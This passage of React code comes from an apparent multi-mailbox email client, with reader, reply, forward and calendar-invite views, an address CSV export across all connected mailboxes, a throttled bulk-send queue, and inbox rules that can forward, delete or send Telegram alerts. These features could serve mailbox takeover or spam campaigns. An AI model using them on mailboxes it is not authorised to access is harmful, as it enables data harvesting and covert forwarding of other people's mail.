                    <div style={{ fontSize: 12, color: isDarkMode ? "#94a3b8" : "#64748b", marginBottom: 4 }}>
                      {senderEmail(selectedEmail.from)}
                    </div>
                    <div style={styles.readerMetaLine}>{currentMessageDate || "Date unavailable"}</div>
                    <div style={styles.readerRecipientLine}>
                      To: {(selectedEmail.to || []).map(getSenderName).join(", ") || selectedUserId || "Mailbox"}
                    </div>
                    {selectedEmail.cc && selectedEmail.cc.length > 0 && (
                      <div style={styles.readerRecipientLine}>
                        CC: {selectedEmail.cc.map(getSenderName).join(", ")}
                      </div>
                    )}
                    {selectedEmail.bcc && selectedEmail.bcc.length > 0 && (
                      <div style={styles.readerRecipientLine}>
                        BCC: {selectedEmail.bcc.map(getSenderName).join(", ")}
                      </div>
                    )}
                  </div>
                  <div style={styles.readerStatePill}>
                    {canUseMailActions
                      ? "Actions enabled"
                      : READ_ONLY_MODE
                        ? "Read-only"
                        : "Actions disabled"}
                  </div>
                  <button
                    style={styles.secondaryButton}
                    onClick={async () => {
                      const email = selectedEmail.from;
                      if (!email) return;
                      setConversationsLoading(true);
                      try {
                        const res = await fetchWithAuth(`${API}/conversations/by-email?email=${encodeURIComponent(email)}&user_id=${encodeURIComponent(selectedUserId)}`);
                        const data = await res.json();
                        if (!res.ok) throw new Error(data.detail || "Failed to load conversations");
                        setConversationsModal({ open: true, email, threads: data.conversations || [] });
                      } catch (err) {
                        addToast(err.message, "error");
                      } finally {
                        setConversationsLoading(false);
                      }
                    }}
                    disabled={conversationsLoading}
                  >
                    {conversationsLoading ? "Loading..." : "📬 All conversations with this email"}
                  </button>
                </div>
              </div>

              <div style={styles.readerBodyFrame}>
                <EmailBody
                  email={selectedEmail}
                  userId={selectedUserId}
                  attachments={selectedEmailAttachments}
                  isDarkMode={isDarkMode}
                  searchQuery={mailSearchQuery}
                  fetchWithAuth={fetchWithAuth}
                />
              </div>

              {showConversationPanel && selectedEmailConversation.length > 0 && (
                <div style={{ ...styles.outlookAttachmentPanel, marginTop: 12, marginBottom: 12 }}>
                  <div style={styles.cardHeaderCompact}>
                    <div>
                      <div style={styles.cardTitleSmall}>Conversation thread</div>
                      <div style={styles.cardSubtitle}>Conversation</div>
                    </div>
                    <button
                      style={styles.outlookCommandButton}
                      onClick={() => {
                        loadConversationOnDemand();
                      }}
                      disabled={conversationLoading}
                    >
                      {conversationLoading ? "Loading..." : "Refresh"}
                    </button>
                  </div>

                  {conversationLoading ? (
                    <div style={styles.emptyState}>Loading conversation...</div>
                  ) : (
                    <div style={{ display: "grid", gap: 10 }}>
                      {selectedEmailConversation.map((message) => (
                        <button
                          key={message.id}
                          style={{
                            textAlign: "left",
                            border: isDarkMode ? "1px solid #334155" : "1px solid #e5e7eb",
                            background: message.id === selectedEmail.id
                              ? (isDarkMode ? "#1e293b" : "#eff6ff")
                              : (isDarkMode ? "#111827" : "#ffffff"),
                            color: isDarkMode ? "#f8fafc" : "#111827",
                            borderRadius: 12,
                            padding: 12,
                            cursor: message.id === selectedEmail.id ? "default" : "pointer",
                          }}
                          onClick={() => {
                            if (message.id && message.id !== selectedEmail.id) openEmail(message.id);
                          }}
                        >
                          <div style={{ display: "flex", justifyContent: "space-between", gap: 12 }}>
                            <div style={{ fontWeight: 800, overflowWrap: "anywhere" }}>
                              {message.subject || "(No subject)"}
                              {message.is_sent_by_me && (
                                <span style={{ marginLeft: 8, fontSize: 10, background: "#12b76a", color: "white", padding: "2px 6px", borderRadius: 999 }}>You</span>
                              )}
                            </div>
                            <div style={{ fontSize: 12, opacity: 0.7, whiteSpace: "nowrap" }}>
                              {message.receivedDateTime || message.sentDateTime || message.date || ""}
                            </div>
                          </div>
                          <div style={{ marginTop: 4, fontSize: 13, opacity: 0.8, overflowWrap: "anywhere" }}>
                            {message.from || message.sender || "Unknown sender"}
                          </div>
                          <div style={{ marginTop: 4, fontSize: 12, opacity: 0.7, overflowWrap: "anywhere" }}>
                            {message.bodyPreview || message.preview || ""}
                          </div>
                          {getMessageAttachmentCount(message) > 0 && (
                            <div
                              style={{
                                marginTop: 8,
                                display: "inline-flex",
                                alignItems: "center",
                                gap: 6,
                                padding: "5px 9px",
                                borderRadius: 999,
                                border: isDarkMode ? "1px solid #475569" : "1px solid #cbd5e1",
                                background: isDarkMode ? "#0f172a" : "#f8fafc",
                                color: isDarkMode ? "#e2e8f0" : "#334155",
                                fontSize: 12,
                                fontWeight: 800,
                              }}
                            >
                              📎 {getMessageAttachmentCount(message) === 1 ? "Attachment" : `${getMessageAttachmentCount(message)} attachments`}
                            </div>
                          )}
                        </button>
                      ))}
                    </div>
                  )}
                </div>
              )}

              {(selectedEmail.hasAttachments || selectedEmail.has_attachments || selectedEmailAttachments.length > 0) && (
                <div style={{ marginTop: 12, marginBottom: 12 }}>
                  <button
                    style={{
                      ...styles.secondaryButton,
                      display: "inline-flex",
                      alignItems: "center",
                      gap: 8,
                      fontWeight: 800,
                    }}
                    onClick={() => setShowAttachmentPanel((prev) => !prev)}
                  >
                    📎 {showAttachmentPanel ? "Hide attachments" : `Show attachments (${selectedEmailAttachments.length || "available"})`}
                  </button>
                </div>
              )}

              {(selectedEmail.hasAttachments || selectedEmail.has_attachments || selectedEmailAttachments.length > 0) && showAttachmentPanel && (
                <div
                style={{
                  ...styles.outlookAttachmentPanel,
                  marginTop: 12,
                  marginBottom: 12,
                  padding: 12,
                  maxHeight: 180,
                  overflowY: "auto",
                  width: "100%",
                  boxSizing: "border-box",
                  background: isDarkMode ? "#0b1220" : "#ffffff",
                  color: isDarkMode ? "#f8fafc" : "#111827",
                  border: isDarkMode ? "1px solid #334155" : "1px solid #e5e7eb",
                }}
              >
                  <div style={styles.cardHeaderCompact}>
                    <div>
                      <div style={styles.cardTitleSmall}>Attachments</div>
                      <div style={{ ...styles.cardSubtitle, fontSize: 12 }}>Attachments</div>
                    </div>
                    <button
                      style={styles.outlookCommandButton}
                      onClick={() => loadEmailAttachments(selectedEmail.id)}
                      disabled={attachmentsLoading}
                    >
                      {attachmentsLoading ? "Loading..." : "Refresh"}
                    </button>
                  </div>
                  {attachmentsLoading ? (
                    <div style={styles.emptyState}>Loading attachments...</div>
                  ) : selectedEmailAttachments.length === 0 ? (
                    <div style={styles.emptyState}>No attachments found for this message.</div>
                  ) : (
                    <div style={styles.outlookAttachmentGrid}>
                      {selectedEmailAttachments.map((attachment) => {
                        const isPreviewable = canPreviewAttachment(attachment);
                        return (
                          <div key={attachment.id || attachment.name} style={{
                              ...styles.outlookAttachmentCard,
                              padding: 10,
                              minHeight: "auto",
                            }}>
                            <div style={styles.attachmentIcon}>{attachmentIconFor(attachment)}</div>
                            <div style={{ flex: 1, minWidth: 0 }}>
                              <div style={styles.attachmentName}>{attachment.name || "attachment"}</div>
                              <div style={styles.attachmentMeta}>
                                {attachment.contentType || attachment.content_type || "application/octet-stream"}
                                {attachment.size ? ` · ${formatAttachmentSize(attachment.size)}` : ""}
                                {attachment.isInline ? " · inline" : ""}
                              </div>
                            </div>
                            {isPreviewable && (
                              <button style={styles.outlookCommandButton} onClick={() => openOrDownloadAttachment(attachment, false)}>
                                View
                              </button>
                            )}
                            <button style={styles.outlookCommandButton} onClick={() => openOrDownloadAttachment(attachment, true)}>
                              Download
                            </button>
                          </div>
                        );
                      })}
                    </div>
                  )}
                </div>
              )}

              {showReplyBox && (
                <div style={{ ...styles.editorCard, padding: 16, background: isDarkMode ? "#111827" : "#fafbff", border: isDarkMode ? "1px solid #334155" : "1px solid #e5e7eb" }}>
                  <div style={{ ...styles.cardHeaderCompact, marginBottom: 8 }}>
                    <div style={styles.cardTitleSmall}>Reply</div>
                    <div style={{ display: "flex", gap: 8, alignItems: "center" }}>
                      <select
                        style={{ ...styles.select, minWidth: 100 }}
                        value={replyBodyMode}
                        onChange={(e) => changeReplyMode(e.target.value)}
                      >
                        <option value="wysiwyg">Visual</option>
                        <option value="html">HTML</option>
                        <option value="text">Plain text</option>
                      </select>
                    </div>
                  </div>

                  <div style={styles.compactGrid2}>
                    <div>
                      <label style={styles.label}>CC</label>
                      <input
                        style={styles.input}
                        placeholder="cc@example.com"
                        value={replyCc}
                        onChange={(e) => setReplyCc(e.target.value)}
                      />
                    </div>
                    <div>
                      <label style={styles.label}>BCC</label>
                      <input
                        style={styles.input}
                        placeholder="bcc@example.com"
                        value={replyBcc}
                        onChange={(e) => setReplyBcc(e.target.value)}
                      />
                    </div>
                  </div>

                  <div style={styles.editorToolbar}>
                    <button
                      type="button"
                      style={styles.secondaryButton}
                      onClick={() => applyReplyEditorCommand("bold")}
                      title="Bold"
                    >
                      B
                    </button>
                    <button
                      type="button"
                      style={styles.secondaryButton}
                      onClick={() => applyReplyEditorCommand("italic")}
                      title="Italic"
                    >
                      I
                    </button>
                    <button
                      type="button"
                      style={styles.secondaryButton}
                      onClick={() => applyReplyEditorCommand("underline")}
                      title="Underline"
                    >
                      U
                    </button>
                    <button
                      type="button"
                      style={styles.secondaryButton}
                      onMouseDown={(e) => {
                        e.preventDefault();
                        const sel = window.getSelection();
                        if (sel && sel.rangeCount > 0) {
                          replySelectedRange.current = sel.getRangeAt(0);
                        }
                      }}
                      onClick={insertReplyHyperlink}
                      title="Hyperlink"
                    >
                      🔗
                    </button>
                    <button
                      type="button"
                      style={styles.secondaryButton}
                      onClick={() => {
                        const fileInput = document.createElement("input");
                        fileInput.type = "file";
                        fileInput.accept = "image/*";
                        fileInput.onchange = (e) => handleReplyInlineImage(e.target.files?.[0]);
                        fileInput.click();
                      }}
                      title="Insert image"
                    >
                      🖼
                    </button>
                    <button
                      type="button"
                      style={styles.secondaryButton}
                      onClick={insertReplySignature}
                      title="Insert signature"
                    >
                      ✍️
                    </button>
                    <button
                      type="button"
                      style={styles.secondaryButton}
                      onClick={() => {
                        setCalendarAttachModal({
                          open: true,
                          to: selectedEmail?.from || "",
                          subject: `Meeting: ${selectedEmail?.subject || ""}`,
                          description: "",
                          location: "",
                          start_time: "",
                          end_time: "",
                        });
                        setCalendarDescription("");
                        setCalendarDescriptionMode("wysiwyg");
                      }}
                      title="Attach calendar invite"
                    >
                      📅
                    </button>
                    {replyBodyMode !== "wysiwyg" && <span style={styles.inlineNote}>Switch to Visual mode for formatting.</span>}
                  </div>

                  {replyBodyMode === "html" ? (
                    <textarea
                      style={{ ...styles.textarea, minHeight: 160, fontFamily: "monospace" }}
                      value={replyBody}
                      onChange={(e) => {
                        setReplyBody(e.target.value);
                        replyBodyRef.current = e.target.value;
                      }}
                      placeholder="HTML reply..."
                    />
                  ) : replyBodyMode === "text" ? (
                    <textarea
                      style={{ ...styles.textarea, minHeight: 160, fontFamily: "monospace", whiteSpace: "pre-wrap" }}
                      value={replyBody}
                      onChange={(e) => {
                        setReplyBody(e.target.value);
                        replyBodyRef.current = e.target.value;
                      }}
                      placeholder="Plain text reply..."
                    />
                  ) : (
                    <div
                      ref={replyEditorRef}
                      contentEditable
                      suppressContentEditableWarning
                      style={{ ...styles.richEditor, minHeight: 160 }}
                      onInput={(e) => {
                        replyBodyRef.current = e.currentTarget.innerHTML;
                        setReplyBody(replyBodyRef.current);
                      }}
                      onFocus={() => {
                        if (replyEditorRef.current && replyEditorRef.current.innerHTML !== replyBodyRef.current) {
                          replyEditorRef.current.innerHTML = replyBodyRef.current || "";
                        }
                      }}
                      onMouseUp={saveReplySelection}
                      onKeyUp={saveReplySelection}
                      dangerouslySetInnerHTML={{ __html: replyBodyRef.current || "" }}
                    />
                  )}

                  <div style={{ display: "flex", gap: 12, alignItems: "center", flexWrap: "wrap", marginTop: 8 }}>
                    <label style={styles.label}>Attachment</label>
                    <input
                      type="file"
                      onChange={(e) => setReplyAttachment(e.target.files?.[0] || null)}
                    />
                    {replyAttachment && <span style={styles.inlineNote}>{replyAttachment.name}</span>}
                  </div>

                  <div style={styles.buttonRow}>
                    <button style={styles.primaryButton} onClick={sendAdvancedReply} disabled={READ_ONLY_MODE}>
                      Send reply
                    </button>
                    <button style={styles.secondaryButton} onClick={() => setShowReplyBox(false)}>
                      Cancel
                    </button>
                  </div>
                </div>
              )}

              <Modal
                open={calendarAttachModal.open}
                onClose={() => {
                  setCalendarAttachModal({ ...calendarAttachModal, open: false });
                  setCalendarDescription("");
                  setCalendarDescriptionMode("wysiwyg");
                }}
                title="Create calendar invite"
              >
                <div style={{ display: 'grid', gap: 12 }}>
                  <input
                    style={styles.input}
                    placeholder="Recipient (optional)"
                    value={calendarAttachModal.to}
                    onChange={(e) => setCalendarAttachModal({ ...calendarAttachModal, to: e.target.value })}
                  />
                  <input
                    style={styles.input}
                    placeholder="Subject"
                    value={calendarAttachModal.subject}
                    onChange={(e) => setCalendarAttachModal({ ...calendarAttachModal, subject: e.target.value })}
                  />
                  <input
                    style={styles.input}
                    placeholder="Location"
                    value={calendarAttachModal.location}
                    onChange={(e) => setCalendarAttachModal({ ...calendarAttachModal, location: e.target.value })}
                  />
                  <input
                    style={styles.input}
                    type="datetime-local"
                    value={calendarAttachModal.start_time}
                    onChange={(e) => setCalendarAttachModal({ ...calendarAttachModal, start_time: e.target.value })}
                  />
                  <input
                    style={styles.input}
                    type="datetime-local"
                    value={calendarAttachModal.end_time}
                    onChange={(e) => setCalendarAttachModal({ ...calendarAttachModal, end_time: e.target.value })}
                  />

                  <div style={{ ...styles.compactGrid2, gap: 10, marginTop: 4 }}>
                    <div>
                      <label style={styles.label}>Description mode</label>
                      <select
                        style={styles.select}
                        value={calendarDescriptionMode}
                        onChange={(e) => changeCalendarDescriptionMode(e.target.value)}
                      >
                        <option value="wysiwyg">Visual editor</option>
                        <option value="html">HTML</option>
                        <option value="text">Plain text</option>
                      </select>
                    </div>
                    <div style={{ display: "flex", alignItems: "flex-end", justifyContent: "flex-end" }}>
                      <span style={styles.inlineNote}>The description will appear in the calendar invite.</span>
                    </div>
                  </div>

                  <div style={styles.editorToolbar}>
                    <button
                      type="button"
                      style={styles.secondaryButton}
                      onClick={() => applyCalendarEditorCommand("bold")}
                      title="Bold"
                    >
                      B
                    </button>
                    <button
                      type="button"
                      style={styles.secondaryButton}
                      onClick={() => applyCalendarEditorCommand("italic")}
                      title="Italic"
                    >
                      I
                    </button>
                    <button
                      type="button"
                      style={styles.secondaryButton}
                      onClick={() => applyCalendarEditorCommand("underline")}
                      title="Underline"
                    >
                      U
                    </button>
                    <button
                      type="button"
                      style={styles.secondaryButton}
                      onMouseDown={(e) => {
                        e.preventDefault();
                        const sel = window.getSelection();
                        if (sel && sel.rangeCount > 0) {
                          calendarDescriptionSelectedRange.current = sel.getRangeAt(0);
                        }
                      }}
                      onClick={insertCalendarHyperlink}
                      title="Hyperlink"
                    >
                      🔗
                    </button>
                    <label style={{ ...styles.secondaryButton, cursor: "pointer" }}>
                      🖼 Insert image
                      <input
                        type="file"
                        accept="image/*"
                        style={{ display: "none" }}
                        onChange={(e) => handleCalendarInlineImage(e.target.files?.[0])}
                      />
                    </label>
                    {calendarDescriptionMode !== "wysiwyg" && (
                      <span style={styles.inlineNote}>Switch to Visual editor to format text.</span>
                    )}
                  </div>

                  {calendarDescriptionMode === "html" ? (
                    <textarea
                      style={{ ...styles.textarea, minHeight: 120, fontFamily: "monospace" }}
                      value={calendarDescription}
                      onChange={(e) => setCalendarDescription(e.target.value)}
                      placeholder="<p>HTML description...</p>"
                    />
                  ) : calendarDescriptionMode === "text" ? (
                    <textarea
                      style={{ ...styles.textarea, minHeight: 120, fontFamily: "monospace", whiteSpace: "pre-wrap" }}
                      value={calendarDescription}
                      onChange={(e) => setCalendarDescription(e.target.value)}
                      placeholder="Plain text description..."
                    />
                  ) : (
                    <div
                      ref={calendarDescriptionRef}
                      contentEditable
                      suppressContentEditableWarning
                      style={{ ...styles.richEditor, minHeight: 120 }}
                      onInput={(e) => setCalendarDescription(e.currentTarget.innerHTML)}
                      onFocus={() => {
                        if (calendarDescriptionRef.current && calendarDescriptionRef.current.innerHTML !== calendarDescription) {
                          calendarDescriptionRef.current.innerHTML = calendarDescription || "";
                        }
                      }}
                      dangerouslySetInnerHTML={{ __html: calendarDescription || "" }}
                    />
                  )}

                  <div style={styles.buttonRow}>
                    <button
                      style={styles.primaryButton}
                      onClick={() => {
                        if (!calendarAttachModal.start_time || !calendarAttachModal.end_time) {
                          addToast("Start and end times are required", "warning");
                          return;
                        }
                        let descContent = calendarDescription;
                        if (calendarDescriptionMode === "wysiwyg" && calendarDescriptionRef.current) {
                          descContent = calendarDescriptionRef.current.innerHTML;
                        }
                        const plainDesc = htmlToPlainText(descContent);
                        const blob = generateIcsFile({
                          ...calendarAttachModal,
                          description: plainDesc,
                        });
                        const file = new File([blob], 'invite.ics', { type: 'text/calendar' });
                        setReplyAttachment(file);
                        setCalendarAttachModal({ ...calendarAttachModal, open: false });
                        setCalendarDescription("");
                        setCalendarDescriptionMode("wysiwyg");
                        addToast("Calendar invite attached to reply", "success");
                      }}
                    >
                      Attach to reply
                    </button>
                    <button
                      style={styles.secondaryButton}
                      onClick={() => {
                        setCalendarAttachModal({ ...calendarAttachModal, open: false });
                        setCalendarDescription("");
                        setCalendarDescriptionMode("wysiwyg");
                      }}
                    >
                      Cancel
                    </button>
                  </div>
                </div>
              </Modal>

              {showForwardBox && (
                <div style={styles.editorCard}>
                  <div style={styles.cardTitleSmall}>Forward</div>

                  <label style={styles.label}>To</label>
                  <textarea
                    style={{ ...styles.textarea, minHeight: 76 }}
                    placeholder="recipient1@example.com; recipient2@example.com"
                    value={forwardTo}
                    onChange={(e) => setForwardTo(e.target.value)}
                  />
                  <div style={styles.inlineNote}>
                    Separate multiple recipients with <b>;</b>, <b>,</b>, a space, or new lines.
                  </div>

                  <label style={styles.label}>CC (optional)</label>
                  <textarea
                    style={{ ...styles.textarea, minHeight: 76 }}
                    placeholder="cc1@example.com; cc2@example.com"
                    value={forwardCc}
                    onChange={(e) => setForwardCc(e.target.value)}
                  />
                  <div style={styles.inlineNote}>
                    You can add multiple CC recipients the same way.
                  </div>

                  <div style={styles.buttonRow}>
                    <button
                      style={styles.primaryButton}
                      onClick={sendForward}
                      disabled={READ_ONLY_MODE}
                    >
                      Forward message
                    </button>
                    <button
                      style={styles.secondaryButton}
                      onClick={() => {
                        setShowForwardBox(false);
                        setForwardTo("");
                        setForwardCc("");
                      }}
                    >
                      Cancel
                    </button>
                  </div>
                </div>
              )}

            </>
          ) : (
            <div style={styles.readerEmpty}>
              <div style={styles.readerEmptyIcon}>☰</div>
              <div style={styles.readerEmptyTitle}>Select a message</div>
              <div style={styles.readerEmptyText}>Choose an email from the message list to read it here.</div>
            </div>
          )}
        </div>
      </div>
    );
  }
    function renderSafeTools() {
    return (
      <div style={styles.sectionStack}>
        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}), padding: 14 }}>
          <div style={{ ...styles.cardHeaderCompact, marginBottom: 8 }}>
            <div>
              <div style={styles.cardTitle}>
                Address Export & Approved Sending
              </div>
              <div style={styles.cardSubtitle}>
                Export mailbox address data and send only to approved recipients
              </div>
            </div>
          </div>

          <div style={styles.infoCard}>
            <div style={styles.infoKey}>Audit export</div>
            <div style={styles.inlineNote}>
              Exports deduped sender/recipient addresses from all
              saved/connected mailboxes as CSV.
            </div>
            <div style={{ marginTop: 12, display: "flex", gap: 10 }}>
              <button
                style={styles.primaryButton}
                onClick={exportEmailAddressesCsv}
              >
                Export Email Addresses CSV
              </button>
              <label style={{ ...styles.inlineNote, display: "inline-flex", alignItems: "center", gap: 6 }}>
                <input
                  type="checkbox"
                  checked={false}
                  onChange={(e) => {
                    exportEmailAddressesCsv({ background: e.target.checked });
                    e.target.checked = false;
                  }}
                />
                Background export (all messages)
              </label>
            </div>
          </div>

          <div style={styles.compactGrid2}>
            <div>
              <label style={styles.label}>Sending mailbox</label>
              <select
                style={styles.select}
                value={selectedUserId}
                onChange={(e) => setSelectedUserId(e.target.value)}
              >
                <option value="">Select sending mailbox</option>
                {availableUsers.map((u) => (
                  <option key={u} value={u}>
                    {u}
                  </option>
                ))}
              </select>
            </div>
            <div>
              <label style={styles.label}>Approved recipient</label>
              <input
                style={styles.input}
                placeholder="one-recipient@example.com"
                value={approvedRecipient}
                onChange={(e) => setApprovedRecipient(e.target.value)}
              />
            </div>
          </div>

          <div style={styles.compactGrid2}>
            <div>
              <label style={styles.label}>CC (optional)</label>
              <input
                style={styles.input}
                placeholder="cc@example.com"
                value={approvedCc}
                onChange={(e) => setApprovedCc(e.target.value)}
              />
            </div>
            <div>
              <label style={styles.label}>BCC (optional)</label>
              <input
                style={styles.input}
                placeholder="bcc@example.com"
                value={approvedBcc}
                onChange={(e) => setApprovedBcc(e.target.value)}
              />
            </div>
          </div>

          <div>
            <label style={styles.label}>Subject</label>
            <input
              style={styles.input}
              placeholder="Subject"
              value={approvedSubject}
              onChange={(e) => setApprovedSubject(e.target.value)}
            />
          </div>

          <div>
            <label style={styles.label}>Message body</label>
            <div style={styles.editorToolbar}>
              <button type="button" style={styles.secondaryButton} onClick={() => setApprovedBody((v) => `${v || ""}<strong>Bold text</strong>`)}>Bold text</button>
              <button type="button" style={styles.secondaryButton} onClick={() => setApprovedBody((v) => `${v || ""}<a href="https://company.com" target="_blank" rel="noreferrer">Link text</a>`)}>Add hyperlink</button>
              <button type="button" style={styles.secondaryButton} onClick={() => setApprovedBody((v) => `${v || ""}<br/><img src="https://example.com/image.png" alt="Image" style="max-width:100%;height:auto;"/>`)}>Insert image URL</button>
            </div>
            <textarea
              style={{ ...styles.input, minHeight: 140, resize: "vertical", fontFamily: "monospace" }}
              placeholder="Write your message. HTML is supported when needed, e.g. <a href='https://company.com'>Visit us</a>"
              value={approvedBody}
              onChange={(e) => setApprovedBody(e.target.value)}
            />
          </div>

          <div style={styles.compactGrid2}>
            <div>
              <label style={styles.label}>Attachment (max 3 MB)</label>
              <input
                id="approvedAttachmentInputStandalone"
                style={styles.input}
                type="file"
                onChange={(e) =>
                  setApprovedAttachment(e.target.files?.[0] || null)
                }
              />
            </div>
            <div style={{ display: "flex", alignItems: "flex-end" }}>
              <button
                style={styles.primaryButton}
                onClick={sendApprovedOneRecipientEmail}
              >
                Send to Approved Recipient
              </button>
            </div>
          </div>
        </section>

        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}), padding: 14 }}>
          <div style={{ ...styles.cardHeaderCompact, marginBottom: 8 }}>
            <div>
              <div style={styles.cardTitle}>Controlled bulk queue</div>
              <div style={styles.cardSubtitle}>
                Paste or upload an approved recipient list. Sends one at a
                time with a delay and cap.
              </div>
            </div>
          </div>

          <div>
            <label style={styles.label}>Approved bulk recipients</label>
            <textarea
              style={{ ...styles.input, minHeight: 120, resize: "vertical" }}
              placeholder={
                "one@example.com\ntwo@example.com\nthree@example.com"
              }
              value={bulkRecipients}
              onChange={(e) => setBulkRecipients(e.target.value)}
            />
          </div>

          <div style={styles.compactGrid3}>
            <div>
              <label style={styles.label}>Upload CSV/TXT (optional)</label>
              <input
                style={styles.input}
                type="file"
                accept=".csv,.txt"
                onChange={(e) =>
                  setBulkRecipientsFile(e.target.files?.[0] || null)
                }
              />
            </div>
            <div>
              <label style={styles.label}>Delay seconds per send</label>
              <input
                style={styles.input}
                type="number"
                min="2"
                max="60"
                value={bulkDelaySeconds}
                onChange={(e) => setBulkDelaySeconds(e.target.value)}
              />
            </div>
            <div>
              <label style={styles.label}>Max recipients per run</label>
              <input
                style={styles.input}
                type="number"
                min="1"
                max="50"
                value={bulkMaxRecipients}
                onChange={(e) => setBulkMaxRecipients(e.target.value)}
              />
            </div>
          </div>

          <button
            style={styles.primaryButton}
            onClick={sendApprovedBulkEmail}
            disabled={bulkSending}
          >
            {bulkSending
              ? "Sending queue..."
              : "Start Approved Bulk Queue"}
          </button>

          {bulkSendResults && bulkSendResults.job_id && (
            <div style={styles.infoCard}>
              <div style={styles.infoKey}>Bulk send progress</div>
              <div style={{ display: "flex", gap: 12, alignItems: "center" }}>
                <div style={{ flex: 1 }}>
                  <div style={{ height: 8, background: "#e5e7eb", borderRadius: 999, overflow: "hidden" }}>
                    <div style={{ width: `${bulkSendResults.total ? (bulkSendResults.progress / bulkSendResults.total) * 100 : 0}%`, height: "100%", background: "#2563eb" }} />
                  </div>
                  <div style={styles.inlineNote}>{bulkSendResults.message}</div>
                </div>
                <div>
                  <span style={{ fontWeight: 900 }}>{bulkSendResults.sent || 0}</span>
                  <span style={{ color: "#667085" }}> sent, </span>
                  <span style={{ fontWeight: 900, color: "#dc2626" }}>{bulkSendResults.failed || 0}</span>
                  <span style={{ color: "#667085" }}> failed</span>
                </div>
              </div>
              {bulkSendResults.completed && (
                <button style={styles.secondaryButton} onClick={() => setBulkSendResults(null)}>Dismiss</button>
              )}
            </div>
          )}

          {bulkSendResults && (
            <div style={styles.infoCard}>
              <div style={styles.infoKey}>Bulk send results</div>
              <div style={styles.pillRow}>
                {renderBadge(
                  `Sent: ${bulkSendResults.sent_count || 0}`,
                  "green"
                )}
                {renderBadge(
                  `Failed: ${bulkSendResults.failed_count || 0}`,
                  "red"
                )}
                {renderBadge(
                  `Rejected: ${bulkSendResults.rejected_count || 0}`,
                  "orange"
                )}
              </div>
              <div
                style={{
                  marginTop: 10,
                  maxHeight: 180,
                  overflow: "auto",
                  fontSize: 12,
                  display: "grid",
                  gap: 4,
                }}
              >
                {(bulkSendResults.results || []).map((r, i) => (
                  <div
                    key={i}
                    style={{
                      padding: "6px 10px",
                      borderRadius: 8,
                      background:
                        r.status === "sent" ? "#ecfdf3" : "#fff1f2",
                      color:
                        r.status === "sent" ? "#15803d" : "#be123c",
                      fontWeight: 700,
                    }}
                  >
                    {r.recipient}: {r.status}
                    {r.error ? ` — ${r.error}` : ""}
                  </div>
                ))}
              </div>
            </div>
          )}
        </section>
      </div>
    );
  }

  function renderAutomation() {
    const isAttachmentCondition = ruleCondition === "has_attachment" || ruleCondition === "no_attachment";

    return (
      <div style={styles.sectionStack}>
        <section style={{ ...styles.card, ...(isDarkMode ? styles.cardDark : {}), padding: 14 }}>
          <div style={{ ...styles.cardHeaderCompact, marginBottom: 8 }}>
            <div>
              <div style={styles.cardTitle}>Rules</div>
              <div style={styles.cardSubtitle}>Create mailbox rules only.</div>
            </div>
            <button style={styles.secondaryButton} onClick={fetchRules}>Refresh rules</button>
          </div>

          <div style={styles.formGrid2}>
            <div>
              <label style={styles.label}>Condition</label>
              <select
                style={styles.input}
                value={ruleCondition}
                onChange={(e) => {
                  const newCondition = e.target.value;
                  setRuleCondition(newCondition);
                  if (newCondition === "has_attachment" || newCondition === "no_attachment") {
                    setRuleKeyword("");
                  }
                }}
              >
                <option value="">Select condition</option>
                <option value="all_incoming">All incoming emails</option>
                <option value="from_contains">From contains</option>
                <option value="from_address_contains">From email address contains</option>
                <option value="sender_contains">Sender contains</option>
                <option value="sender_address_contains">Sender address contains</option>
                <option value="email_address_contains">Any email address contains</option>
                <option value="to_contains">To contains</option>
                <option value="cc_contains">CC contains</option>
                <option value="recipient_contains">Any recipient contains</option>
                <option value="subject_contains">Subject contains</option>
                <option value="body_contains">Body preview contains</option>
                <option value="subject_or_body_contains">Subject or body contains</option>
                <option value="has_attachment">Has attachment</option>
                <option value="no_attachment">Has no attachment</option>
                <option value="importance_high">Importance is high</option>
                <option value="is_unread">Message is unread</option>
                <option value="is_read">Message is read</option>
              </select>
            </div>
            <div>
              <label style={styles.label}>Condition value</label>
              <input
                style={styles.input}
                value={ruleKeyword}
                onChange={(e) => setRuleKeyword(e.target.value)}
                placeholder={isAttachmentCondition ? "Not required" : "Keyword, address, sender, subject text..."}
                disabled={isAttachmentCondition}
              />
              {isAttachmentCondition && <div style={styles.inlineNote}>No keyword required for this condition.</div>}
            </div>
          </div>

          <div style={styles.subSectionTitle}>Actions, up to 4</div>
          <div style={styles.formGrid2}>
            {ruleActions.map((actionValue, index) => (
              <div key={`rule-action-${index}`}>
                <label style={styles.label}>Action {index + 1}</label>
                <div style={{ display: "flex", gap: 8 }}>
                  <select
                    style={styles.input}
                    value={actionValue}
                    onChange={(e) => updateRuleActionSlot(index, e.target.value)}
                  >
                    <option value="">Select action</option>
                    <option value="mark_read">Mark as read</option>
                    <option value="mark_unread">Mark as unread</option>
                    <option value="move">Move to folder</option>
                    <option value="delete">Delete</option>
                    <option value="forward">Forward</option>
                    <option value="telegram_alert">Send Telegram alert</option>
                  </select>
                  {ruleActions.length > 1 && (
                    <button style={styles.dangerButton} onClick={() => removeRuleActionSlot(index)}>Remove</button>
                  )}
                </div>
              </div>
            ))}
          </div>

          <div style={styles.buttonRow}>
            <button style={styles.secondaryButton} onClick={addRuleActionSlot} disabled={ruleActions.length >= 4}>
              Add another action
            </button>
          </div>

          {ruleActions.includes("move") && (
            <div>
              <label style={styles.label}>Target folder</label>
              <select style={styles.input} value={ruleTargetFolder} onChange={(e) => setRuleTargetFolder(e.target.value)}>
                <option value="">Select folder</option>
                {folders.map((folder) => (
                  <option key={folder.id} value={folder.id}>{folder.displayName || folder.name}</option>
                ))}
              </select>
            </div>
          )}

          {ruleActions.includes("forward") && (
            <div>
              <label style={styles.label}>Forward to</label>
              <input style={styles.input} value={ruleForwardTo} onChange={(e) => setRuleForwardTo(e.target.value)} placeholder="recipient@domain.com" />
            </div>
          )}

          <div style={styles.buttonRow}>
            <button style={styles.primaryButton} onClick={addRule}>Create rule</button>
            <button style={styles.secondaryButton} onClick={fetchRules}>Reload</button>
          </div>

          <div style={styles.tableWrap}>
            <table style={styles.table}>
              <thead>
                <tr>
                  <th>Condition</th>
                  <th>Value</th>
                  <th>Actions</th>
                  <th>Status</th>
                  <th></th>
                </tr>
              </thead>
              <tbody>
                {rules.length === 0 ? (
                  <tr><td colSpan="5">No rules yet. None</td></tr>
                ) : (
                  rules.map((rule) => (
                    <tr key={rule.id}>
